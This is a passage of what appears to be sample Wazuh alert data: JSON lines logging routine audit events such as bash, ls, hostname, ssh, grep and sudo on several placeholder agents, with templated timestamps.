/usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: 